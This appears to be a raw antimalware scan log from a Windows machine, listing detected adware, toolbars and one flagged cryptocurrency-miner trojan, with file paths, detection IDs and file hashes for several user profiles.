PUP.Optional.MindSpark, C:\Users\lindag\AppData\LocalLow\MapsGalaxy_39\MapsGalaxy_39\Cache, No Action By User, 764, 178422, , , , , , 
PUP.Optional.MindSpark, C:\Users\lindag\AppData\LocalLow\MapsGalaxy_39\MapsGalaxy_39, No Action By User, 764, 178422, , , , , , 
PUP.Optional.MindSpark, C:\Users\lindag\AppData\LocalLow\MapsGalaxy_39\bar\Settings, No Action By User, 764, 178422, , , , , , 
PUP.Optional.MindSpark, C:\Users\lindag\AppData\LocalLow\MapsGalaxy_39\bar\History, No Action By User, 764, 178422, , , , , , 
PUP.Optional.MindSpark, C:\Users\lindag\AppData\LocalLow\MapsGalaxy_39\bar\Cache, No Action By User, 764, 178422, , , , , , 
PUP.Optional.MindSpark, C:\Users\lindag\AppData\LocalLow\MapsGalaxy_39\bar, No Action By User, 764, 178422, , , , , , 
PUP.Optional.MindSpark, C:\USERS\LINDAG\APPDATA\LOCALLOW\MapsGalaxy_39, No Action By User, 764, 178422, 1.0.49973, , ame, , , 
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\MapsGalaxy_39\bar\ie9mesg\COMMON, No Action By User, 764, 178422, , , , , , 
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\MapsGalaxy_39\bar\Message\COMMON, No Action By User, 764, 178422, , , , , , 
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\MapsGalaxy_39\bar\ie9mesg, No Action By User, 764, 178422, , , , , , 
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\MapsGalaxy_39\bar\Message, No Action By User, 764, 178422, , , , , , 
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\MapsGalaxy_39\bar, No Action By User, 764, 178422, , , , , , 
PUP.Optional.MindSpark, C:\USERS\MARILYN\APPDATA\LOCALLOW\MapsGalaxy_39, No Action By User, 764, 178422, 1.0.49973, , ame, , , 
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\MapsGalaxy_39EI\Installr\Cache, No Action By User, 764, 178422, , , , , , 
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\MapsGalaxy_39EI\Installr, No Action By User, 764, 178422, , , , , , 
PUP.Optional.MindSpark, C:\USERS\MARILYN\APPDATA\LOCALLOW\MapsGalaxy_39EI, No Action By User, 764, 178422, 1.0.49973, , ame, , , 
PUP.Optional.MindSpark, C:\Users\Guest\AppData\LocalLow\TotalRecipeSearch_14\TotalRecipeSearch_14\Cache, No Action By User, 764, 178464, , , , , , 
PUP.Optional.MindSpark, C:\Users\Guest\AppData\LocalLow\TotalRecipeSearch_14\TotalRecipeSearch_14, No Action By User, 764, 178464, , , , , , 
PUP.Optional.MindSpark, C:\Users\Guest\AppData\LocalLow\TotalRecipeSearch_14\bar\Settings, No Action By User, 764, 178464, , , , , , 
PUP.Optional.MindSpark, C:\Users\Guest\AppData\LocalLow\TotalRecipeSearch_14\bar\History, No Action By User, 764, 178464, , , , , , 
PUP.Optional.MindSpark, C:\Users\Guest\AppData\LocalLow\TotalRecipeSearch_14\bar\Cache, No Action By User, 764, 178464, , , , , , 
PUP.Optional.MindSpark, C:\Users\Guest\AppData\LocalLow\TotalRecipeSearch_14\bar, No Action By User, 764, 178464, , , , , , 
PUP.Optional.MindSpark, C:\USERS\GUEST\APPDATA\LOCALLOW\TotalRecipeSearch_14, No Action By User, 764, 178464, 1.0.49973, , ame, , , 
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\TotalRecipeSearch_14\bar\ie9mesg\COMMON, No Action By User, 764, 178464, , , , , , 
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\TotalRecipeSearch_14\bar\ie9mesg, No Action By User, 764, 178464, , , , , , 
PUP.Optional.MindSpark, C:\Users\Marilyn\AppData\LocalLow\TotalRecipeSearch_14\bar, No Action By User, 764, 178464, , , , , , 
PUP.Optional.MindSpark, C:\USERS\MARILYN\APPDATA\LOCALLOW\TotalRecipeSearch_14, No Action By User, 764, 178464, 1.0.49973, , ame, , , 
PUP.Optional.MySearchDial, C:\Users\Marilyn\AppData\Roaming\mysearchdial\icons_2.18.7.0, No Action By User, 108, 178629, , , , , , 
PUP.Optional.MySearchDial, C:\Users\Marilyn\AppData\Roaming\mysearchdial\UpdateProc, No Action By User, 108, 178629, , , , , , 
PUP.Optional.MySearchDial, C:\USERS\MARILYN\APPDATA\ROAMING\MYSEARCHDIAL, No Action By User, 108, 178629, 1.0.49973, , ame, , , 
PUP.Optional.PriceGong, C:\Users\Marilyn\AppData\LocalLow\PriceGong\Data, No Action By User, 1535, 179000, , , , , , 
PUP.Optional.PriceGong, C:\Users\Marilyn\AppData\LocalLow\PriceGong\tmp, No Action By User, 1535, 179000, , , , , , 
PUP.Optional.PriceGong, C:\USERS\MARILYN\APPDATA\LOCALLOW\PRICEGONG, No Action By User, 1535, 179000, 1.0.49973, , ame, , , 
PUP.Optional.SearchProtect.AppFlsh, C:\Users\Marilyn\AppData\Local\SearchProtect\Logs, No Action By User, 1613, 181457, , , , , , 
PUP.Optional.SearchProtect.AppFlsh, C:\USERS\MARILYN\APPDATA\LOCAL\SEARCHPROTECT, No Action By User, 1613, 181457, 1.0.49973, , ame, , , 
PUP.Optional.Conduit, C:\USERS\MARILYN\APPDATA\LOCAL\CONDUIT, No Action By User, 181, 182116, 1.0.49973, , ame, , , 
PUP.Optional.PCKeeper, C:\ProgramData\Essentware\PCKeeper\backup\01_12_2016\19_00, No Action By User, 1335, 437658, , , , , , 
PUP.Optional.PCKeeper, C:\ProgramData\Essentware\PCKeeper\backup\07_11_2016\14_00, No Action By User, 1335, 437658, , , , , , 
PUP.Optional.PCKeeper, C:\ProgramData\Essentware\PCKeeper\backup\21_11_2016\11_00, No Action By User, 1335, 437658, , , , , , 
PUP.Optional.PCKeeper, C:\ProgramData\Essentware\PCKeeper\backup\01_12_2016, No Action By User, 1335, 437658, , , , , , 
PUP.Optional.PCKeeper, C:\ProgramData\Essentware\PCKeeper\backup\07_11_2016, No Action By User, 1335, 437658, , , , , , 
PUP.Optional.PCKeeper, C:\ProgramData\Essentware\PCKeeper\backup\21_11_2016, No Action By User, 1335, 437658, , , , , , 
PUP.Optional.PCKeeper, C:\ProgramData\Essentware\PCKeeper\ProblemFinder, No Action By User, 1335, 437658, , , , , , 
PUP.Optional.PCKeeper, C:\ProgramData\Essentware\PCKeeper\Minidumps, No Action By User, 1335, 437658, , , , , , 
PUP.Optional.PCKeeper, C:\ProgramData\Essentware\PCKeeper\backup, No Action By User, 1335, 437658, , , , , , 
PUP.Optional.PCKeeper, C:\ProgramData\Essentware\AccountService, No Action By User, 1335, 437658, , , , , , 
PUP.Optional.PCKeeper, C:\ProgramData\Essentware\Installer, No Action By User, 1335, 437658, , , , , , 
PUP.Optional.PCKeeper, C:\ProgramData\Essentware\PCKeeper, No Action By User, 1335, 437658, , , , , , 
PUP.Optional.PCKeeper, C:\PROGRAMDATA\ESSENTWARE, No Action By User, 1335, 437658, 1.0.49973, , ame, , , 
PUP.Optional.Conduit, C:\Users\Marilyn\AppData\LocalLow\Conduit\Community Alerts\Dialogs\AppNotificationDialog\Images\light, No Action By User, 181, 182117, , , , , , 
PUP.Optional.Conduit, C:\Users\Marilyn\AppData\LocalLow\Conduit\Community Alerts\Dialogs\AppNotificationDialog\Images\dark, No Action By User, 181, 182117, , , , , , 
PUP.Optional.Conduit, C:\Users\Marilyn\AppData\LocalLow\Conduit\Community Alerts\Dialogs\AppNotificationDialog\Images, No Action By User, 181, 182117, , , , , , 
PUP.Optional.Conduit, C:\Users\Marilyn\AppData\LocalLow\Conduit\Community Alerts\Dialogs\AppNotificationDialog, No Action By User, 181, 182117, , , , , , 
PUP.Optional.Conduit, C:\Users\Marilyn\AppData\LocalLow\Conduit\Community Alerts\LanguagePacks, No Action By User, 181, 182117, , , , , , 
PUP.Optional.Conduit, C:\Users\Marilyn\AppData\LocalLow\Conduit\Community Alerts\Dialogs, No Action By User, 181, 182117, , , , , , 
PUP.Optional.Conduit, C:\Users\Marilyn\AppData\LocalLow\Conduit\Community Alerts\Feeds, No Action By User, 181, 182117, , , , , , 
PUP.Optional.Conduit, C:\Users\Marilyn\AppData\LocalLow\Conduit\Community Alerts\Log, No Action By User, 181, 182117, , , , , , 
PUP.Optional.Conduit, C:\Users\Marilyn\AppData\LocalLow\Conduit\Community Alerts, No Action By User, 181, 182117, , , , , , 
PUP.Optional.Conduit, C:\USERS\MARILYN\APPDATA\LOCALLOW\CONDUIT, No Action By User, 181, 182117, 1.0.49973, , ame, , , 
PUP.Optional.SearchProtect.AppFlsh, C:\Program Files (x86)\SearchProtect\Main\rep, No Action By User, 1613, 182259, , , , , , 
PUP.Optional.SearchProtect.AppFlsh, C:\Program Files (x86)\SearchProtect\Main, No Action By User, 1613, 182259, , , , , , 
PUP.Optional.SearchProtect.AppFlsh, C:\PROGRAM FILES (X86)\SEARCHPROTECT, No Action By User, 1613, 182259, 1.0.49973, , ame, , , 
PUP.Optional.PCKeeper, C:\Users\Marilyn\AppData\Local\Essentware\DefaultDomain_Path_xseuterajdw5fywvmojz5uax4dukfyo4\2.2.2155.0, No Action By User, 1335, 182318, , , , , , 
PUP.Optional.PCKeeper, C:\Users\Marilyn\AppData\Local\Essentware\DefaultDomain_Path_xseuterajdw5fywvmojz5uax4dukfyo4, No Action By User, 1335, 182318, , , , , , 
PUP.Optional.PCKeeper, C:\USERS\MARILYN\APPDATA\LOCAL\ESSENTWARE, No Action By User, 1335, 182318, 1.0.49973, , ame, , , 
PUP.Optional.Conduit.Generic, C:\PROGRAM FILES (X86)\CONDUIT\COMMUNITY ALERTS, No Action By User, 1403, 443543, 1.0.49973, , ame, , , 
Trojan.BitCoinMiner.E, C:\WINDOWS\INF\ASPNET, No Action By User, 3744, 862122, 1.0.49973, , ame, , , 
PUP.Optional.ASK.Generic, C:\Users\lindag\AppData\LocalLow\AskToolbar\APNU, No Action By User, 2058, 549226, , , , , , 
PUP.Optional.ASK.Generic, C:\USERS\LINDAG\APPDATA\LOCALLOW\ASKTOOLBAR, No Action By User, 2058, 549226, 1.0.49973, , ame, , , 
 
File: 1201
PUP.Optional.ASK, C:\USERS\LINDAG\APPDATA\LOCAL\TEMP\APNLOGS\iw.log, No Action By User, 268, 184754, 1.0.49973, , ame, , 58B9AD95F6FCEF25E569CA5F982168FA, D2BDDB3F62839E4DB05A6F65975C5644197265CEFA0FE267175600830A1B2FD7
PUP.Optional.VisualBee, C:\ProgramData\VisualBee\VisualBeeDB.exe, No Action By User, 169, 174256, , , , , AF7AD01C873B7A4A0AA92E14F2C8A691, 511CB5E88DFC80F05F79A1E80ABFCEEC20CA85AD313E6CFEDBBA2EE5C686813D
PUP.Optional.VisualBee, C:\ProgramData\VisualBee\VisualBeeSoftware.exe, No Action By User, 169, 174256, , , , , 861051538A4BF3900087719CA99F48E5, 3B5E9360AD1664D2EA024BB2D317E36C100414733574C07F0C623707E1C5CD12
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\3 colors 01_smart.jpg, No Action By User, 169, 175250, , , , , 0E460542EC283F4FE6464C11DEB98A44, B85F83E712B6750A91226233BF539870391E9F5DEAE169DE088AE6844EBEB338
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\3 colors 01_text.jpg, No Action By User, 169, 175250, , , , , 6CB497FAE3EF48816BD3670BABFC502E, F0C74EB7638C0B00538A3A40314D5F7DDFDCB61FB316B01CB968FE4AC294CF3A
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\3 colors 01_thumb.jpg, No Action By User, 169, 175250, , , , , 439C0A06055C938C391FB49232DA544A, 71B70266C2A6C16A484CA3EE4A2D37A39646784C0841C94EB439F5A1E2BD0C3A
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\3 Colors 02_smart.jpg, No Action By User, 169, 175250, , , , , 2440FDC7DB771E2DB17D674C67F99173, D09B19E7FF6A1634C929E821B3366232E3C87EDCD34B1C7F100E6A36917A3028
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\3 Colors 02_text.jpg, No Action By User, 169, 175250, , , , , 3B4CCCC9576F88E71AB1BDAF549E21D4, 5AA67C3945A86B654E5CFB006C842CF47B6E7E83FB632CB033F2690ABDD59A41
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\3 Colors 02_thumb.jpg, No Action By User, 169, 175250, , , , , BDC2EEE4282C3631F3A87E2555371DC9, 76D6D5FCC07BDF7F098FAF8342303955D6F26BE50A3921B946214D2DEDD28390
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\3 Colors 03_smart.jpg, No Action By User, 169, 175250, , , , , 6BAF7901AA1AC338E456465BFD236AE8, 55D48CFE93EB76D70FC4AEED1B3D299B9289334344FD1D93AE69F617E75EBFC0
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\3 Colors 03_text.jpg, No Action By User, 169, 175250, , , , , 24FB29A757355709D2B43B507F555A01, B6B46AAC4AB8209663B5C955ACCE60FC9168022EEE5EAA0E928EBF12A93DF180
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\3 Colors 03_thumb.jpg, No Action By User, 169, 175250, , , , , 8788E5BDC255BB21296150660CD4B2AF, 02B1ADBE6325F3CFF4807AAACD614D480A94AC53591DBFF406EC2CB3F8CE5D90
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\3 Colors 04_smart.jpg, No Action By User, 169, 175250, , , , , ABF3E72552F00F37B6F516EE6643CAA0, 4DF0E14E3FA2343F79EAA689ACF6D5CC95A14D1EECF4D0E233C0C82D48475D1D
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\3 Colors 04_text.jpg, No Action By User, 169, 175250, , , , , CDFBC456A3A3DE624E4F21F02B3AFFD0, D6BD09A060B13FAB3CCF83D26A01A42BBA3B239BF038BBFFB32B65985BC425BC
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\3 Colors 04_thumb.jpg, No Action By User, 169, 175250, , , , , FB740E6EB10243DBB91A8D4F0CDF1E27, D239B4E4964DD1DAD3839467F35952905EBC05796DF9CCFBA76E72E94A1058D7
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\3 Colors 05_smart.jpg, No Action By User, 169, 175250, , , , , 42B4A16C10AF844CC5A7A1735E012050, DD71B1073928F7DA36C0623588CBCE6D67333A68D35A6A0795D10C4616667CDD
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\3 Colors 05_text.jpg, No Action By User, 169, 175250, , , , , BDE42E463DDF3145243528B84A536949, C2AFAF534893563E4723139E9B4BE2BA67AED6A8E23242CF88A913B53CE236EC
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\3 Colors 05_thumb.jpg, No Action By User, 169, 175250, , , , , CFD109E3C3432D9B8D68DD3030BA3AD4, 6CC20377CC8F772A188000C739E84F06FAB5D11676D5F6C6D5BC83627089FEE6
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\3 Colors 06_smart.jpg, No Action By User, 169, 175250, , , , , 12EF4F687DFB7CC365654DD89273AD5A, 5EB510042299F4806767FB7D0D36D16174B6BE21DCA8EEFE13C74B5898F68D60
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\3 Colors 06_text.jpg, No Action By User, 169, 175250, , , , , 14B14A2EA144AA3A1AC9EC5196316F1E, 1996D6B7B67EC5BF1759991316BAF2A00464D303C4EF5ED7BBFFC1041169E4D9
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\3 Colors 06_thumb.jpg, No Action By User, 169, 175250, , , , , 456B640468B78888E3DD5F3A462458D7, 14334C67A42E2C9BA530910A6AD25475D92CA8DCCECBC245DFC0621012161884
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\3 Colors 07_smart.jpg, No Action By User, 169, 175250, , , , , 228773687DF695E7013F66FA280753A5, 843528D59E44D1E2077D9177B5396B12CFF9CF2CC0D2A0C52E326EFA46202158
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\3 Colors 07_text.jpg, No Action By User, 169, 175250, , , , , 2E7AA0765845CE27B89A6F4443572099, 3EA5C2B0DFB0295CFF2DF70BBB980EFF26BB00441E5651B363C4B7791E3BE136
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\3 Colors 07_thumb.jpg, No Action By User, 169, 175250, , , , , B496F5177C89469B766CDB4333547CD3, FBD4DD6F76666365B8F2637617138813FE3B9314C3AD4D7EFBA71B30B1CAFBD5
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\3 Colors 08_smart.jpg, No Action By User, 169, 175250, , , , , 2A887CA8D0F7D36C3C8975BF6C2DC91C, 714E6019EC5B6033759BC08D01916182EFCAB2A44436F0FEA46915D0409018E4
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\3 Colors 08_text.jpg, No Action By User, 169, 175250, , , , , 07143D154D26A83332AD9D17009871FB, 81A703D52F5D444B522A6CC97B99B78F6126547D9F6EBD9B225BCD364FF4658C
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\3 Colors 08_thumb.jpg, No Action By User, 169, 175250, , , , , BA4A3CF9E6C17F962A96AF195B687F4B, E4958DEF502D7766D948CA8C72AB1378CA0A2BF285495C9D6535D801E1D94D3C
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Analogue_6frame_smart.jpg, No Action By User, 169, 175250, , , , , 2B5309918C18FC0A5D110633B685CDB8, C2EB6B1213C3F379E4DA2A3453F23428BD204596E15B8E757270E0B5105060F9
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Analogue_6frame_text.jpg, No Action By User, 169, 175250, , , , , AAC628648D92B31D5E591926E4617DA1, F7132CCD06AB9DDFADFE4CB9EE2A38D099828C2E08B71002AF67F45515966701
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Analogue_6frame_thumb.jpg, No Action By User, 169, 175250, , , , , A5356C8A8C3ADEE1581DC296A6C6C45A, 37D9A6151D0EAAADFFE0BA844AB686B95526DF274D978C7836762F4875850F76
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Analogue_blue_smart.jpg, No Action By User, 169, 175250, , , , , 14849899759DB187C469582160E9C8BD, 234B85F018FDFD77329C96EFA989FFDB9A0A627EE8013E392105628FE83B81BC
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Analogue_blue_text.jpg, No Action By User, 169, 175250, , , , , B448E4355F0AADC39B9AEDF24033274B, AE39268AE425EB166A433B137EBF2140AFC05C7255D5F374057C3C18606EAC4E
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Analogue_blue_thumb.jpg, No Action By User, 169, 175250, , , , , 3A3C0A88CD80D4B8C3C21E7F8C5A9E29, CCB0A8C3D3142A57D9CCF5E5FE0456A780E23F204C3F7D1F90CD90D2D6B3A4D7
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Analogue_book_smart.jpg, No Action By User, 169, 175250, , , , , CC27C2C6FBFC9CC721D05E0C3E3DD29C, 4E1E2D93F5188F4CE0FDC324473D8459A31FF375DC7D8352A45A2FC980F2F647
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Analogue_book_text.jpg, No Action By User, 169, 175250, , , , , 58B10D7A685D7F83724F62A5895E3766, 1FA91CAA7CCF136C7AD2374163C2DD9C187B3B17AFD2188F005FD559B51595B6
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Analogue_book_thumb.jpg, No Action By User, 169, 175250, , , , , 68B990284764782E74A13135163F31C0, E4A6B4DD8A8BBD9A37CBD5AECE46DBD6228B6F3A823A531FFD7FA322AE5F34DD
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Analogue_chinesepaper_smart.jpg, No Action By User, 169, 175250, , , , , C8CCA43A7F53480922990A1D53966A17, 49D68E91341AC8D1D888149F11185F919B9638962D58814B847618C87A8CED8C
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Analogue_chinesepaper_text.jpg, No Action By User, 169, 175250, , , , , BC89C21DF0010DF64A9EF757EA97107B, 7920FFDDFAFDE1D09501E72CD7CF34B1EBB2B9DD5CEE19C3F5727C8E515365A2
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Analogue_chinesepaper_thumb.jpg, No Action By User, 169, 175250, , , , , 380FADB05695F936B994ED7EA4CABC0F, D5979733C7B9902F9948855D046923139DF17CE3102B75B2976A4F5373342647
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Analogue_greenstars_smart.jpg, No Action By User, 169, 175250, , , , , E073C059B39FD0E6E9E4718AE9184242, 663B4216C231E8AEB2C90D14BBD28A3839BDDBCEB18D6F77E6CB461F93473FB0
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Analogue_greenstars_text.jpg, No Action By User, 169, 175250, , , , , 57D9B0170383D693EF970B5985C17E60, 676A372EA3850D696A9470B57C263CE1F2C747D0CC308EB53B76EEC15D3749B8
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Analogue_greenstars_thumb.jpg, No Action By User, 169, 175250, , , , , 9308D4D05781B203A6CC2296EA029D71, 2E44C35C64AAA654BE2B9725860AE1B13481723A96A9127A4D77E7DAE03C5603
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Analogue_majestic_smart.jpg, No Action By User, 169, 175250, , , , , 16C10DF04E2C5ED10EC173FA5E492CAA, 40A1E04C1E555D6213902BFBB5AD83D60D381B161C3F305ABC32F5793724A0E6
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Analogue_majestic_text.jpg, No Action By User, 169, 175250, , , , , A9FAA3E478ACEA57A76BD72D13F68B42, 41AD4D8B9702BD2A823B764F5342A4659B04A5718559A5A290E8C896293F7A9E
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Analogue_majestic_thumb.jpg, No Action By User, 169, 175250, , , , , D27F4B40F88224E14FC07CE4AB517C0F, EF069ACB3787A51B40A84FD513064B39E003EC808F16871DCF159EAF8863F78B
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Analogue_paperback_smart.jpg, No Action By User, 169, 175250, , , , , B719109EA7595B4A40C139305CC81BBC, 8512123DDCDCA5A74480E8CA0F720C403113CC9537FC093DC05A6BBB2AD11B1D
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Analogue_paperback_text.jpg, No Action By User, 169, 175250, , , , , 7B8CCAC30D01DF09C51619AC0825A066, 8BC8B31DFEC6770476FA469D95A99253FEA2A4993C91D3CBBA1201A25427776F
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Analogue_paperback_thumb.jpg, No Action By User, 169, 175250, , , , , 72E543D74E73598BCFDFB682B0C694B8, 16F9AD8BC263970FB0D7723254C1DC16A1D71DCB4D97884C833ED96020064148
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Analogue_pareeca_smart.jpg, No Action By User, 169, 175250, , , , , 5F09BDF64937C39540482AF92C3CBE72, 6C749EE612071E77853BE6751E27BC5926608E9E0FC7B8AA37CC1D7117A6C040
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Analogue_pareeca_text.jpg, No Action By User, 169, 175250, , , , , E3E4FB92A4BAA74477E6705F89BAD214, 446FD5446448CFA15650B55D4F206BF732F4C9978E7FAD53DC01799A168294D6
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Analogue_pareeca_thumb.jpg, No Action By User, 169, 175250, , , , , 35C8501A0C18798A603D56E95D33041A, F0D481957F62738181099E350CBEC4C7D445B33BE2A38206585AF897CE7E72CE
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Analogue_pink_smart.jpg, No Action By User, 169, 175250, , , , , AF21F812C7F3F923E521552A7BD680FB, 20839B2FA8E139C48E56FF0169EEE867BF8B9EAD68A397C9D161FC554F27BB68
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Analogue_pink_text.jpg, No Action By User, 169, 175250, , , , , 7A8FF6C84A9E701F844395A4FF452D89, 8C63C5B3C8FC2674E6ADEA7E08F058066360793E325989C1F50884EE978FD333
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Analogue_pink_thumb.jpg, No Action By User, 169, 175250, , , , , 164DD3E40C6157C22129165A91C86BFA, B900CEB51E96BECA708D9E904F6DF2E3EBF1C4700CB82A20AB7F466090F0E5C9
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Analogue_spirala_smart.jpg, No Action By User, 169, 175250, , , , , E86EBB8ED2B19A90462E83C6689F6961, 4342D1FC9765B733BDEAA9FC17F7BF2EEE4FBCD39BC17AC21F8ED64D24A0C2D2
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Analogue_spirala_text.jpg, No Action By User, 169, 175250, , , , , A29C52BAE22DF914927354C87D5DE950, A649DB058803BFCF9C432F633318CB441407DBF0A5749F5168A84ADD7102D95A
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Analogue_spirala_thumb.jpg, No Action By User, 169, 175250, , , , , B2C585CA09B25894BA6B476407742810, 55FAC4D05999449645C866DFEBDE5861D17B4D0949B45E272EFA78C32554AF65
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\BaloonGirl_smart.jpg, No Action By User, 169, 175250, , , , , AF77F141E7E57A37055FBBA5710CE424, B8A9FA62F2F47AD3DD62354365C34B45D9638F78958E35131D0A9808AFA2F452
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\BaloonGirl_text.jpg, No Action By User, 169, 175250, , , , , 8FCAB4D55483CF252CE48CC989948C0B, 71833744646784F10614CC881EEE4F21D16113F5877D6555E32812C5DA40787F
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\BaloonGirl_thumb.jpg, No Action By User, 169, 175250, , , , , 0CEA598F6C755B5FBA98A82DEC31BC2D, 164D87D1A25BCECFA71AAEE17B69EF5F638D8B8EBD1A8C6D3C92F6FBF2B78402
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\ChineseDoll_smart.jpg, No Action By User, 169, 175250, , , , , E3220349297600761995DAFB674C8E51, 7F67A48FFE77CB6F898597B2697A114FACBA7D1093A023CF93745711B2E7ECF5
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\ChineseDoll_text.jpg, No Action By User, 169, 175250, , , , , 5F6EAB2A50E1E3579794E47A1CD5F3C3, 14A85F70316EE8D22200EE041257FC47819E4F941ADF74F08269B6C5A2B29AB0
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\ChineseDoll_thumb.jpg, No Action By User, 169, 175250, , , , , 7CED57C27E86F131B4F7BD1C50CACE6C, 17FD7C53976C4B0B890CE0DABA41B26FD46CD97398BB55634C1B4E6CFF3A6BDD
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Christmas1_smart.jpg, No Action By User, 169, 175250, , , , , 0D6AEEAE6B74B56EEA3A58B620DACF87, 0B85E83C5AC63C99A7CAA7F409E495F9AE586948EB5ECAEFF656E658DA614173
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Christmas1_text.jpg, No Action By User, 169, 175250, , , , , F0163F99579EE06890EA76909C10E64D, D248814E736F68C33E4B2AE85F8F1E10F646756875A23D0C2A3858BB97664A10
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Christmas1_thumb.jpg, No Action By User, 169, 175250, , , , , 88F1090C678396C19FE19E6B047C591D, 34E78B3DAE282745D45D258CECEB709F9F2BD54D65D2351FB86DB98579A2A9C2
PUP.Optional.VisualBee, C:\Users\Marilyn\AppData\Local\VisualBeeClient\Domain\Christmas2_smart.jpg, No Action By User, 169, 175250, , , , , E4E84C434672CE706F88E10E4235EAB5, 613C65041709E2FE268A38C62241459E06CF0054A4E758843A18EEB3F0FEF436
